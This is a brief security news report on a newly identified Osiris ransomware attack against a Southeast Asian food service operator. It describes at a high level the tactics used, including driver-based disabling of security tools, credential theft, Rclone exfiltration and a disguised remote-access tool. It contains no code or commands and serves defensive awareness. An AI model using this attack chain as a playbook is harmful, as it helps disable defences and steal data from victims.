RESEARCHERS identified a new Osiris ransomware used in a November 2025 attack against a major Southeast Asian food service franchise operator, with the operators deploying a malicious POORTRY driver via BYOVD to disable security tools.
The discovery, according to Symantec and VMware Carbon Black threat hunters, notes that Osiris is a full-featured ransomware capable of stopping services, encrypting selected files, and dropping a ransom note, while appending a .Osiris extension to encrypted files and deleting VSS snapshots.
The attack chain began days before deployment as data was quietly stolen using Rclone and uploaded to a Wasabi cloud storage bucket, with tools such as a Mimikatz variant named kaz[.]exe reused from past Inc ransomware operations, suggesting imitation or a former Inc affiliate. Dual-use tools like Netscan, Netexec, MeshAgent, and a modified RustDesk RMM tool masquerading as “WinZip Remote Desktop” were employed to conceal activity, and KillAV was used alongside BYOVD to shut down security software.
The operation also involved enabling RDP for remote access before the ransomware run, and researchers note possible links to the INC ransomware group and Medusa activity, though attribution remains unclear.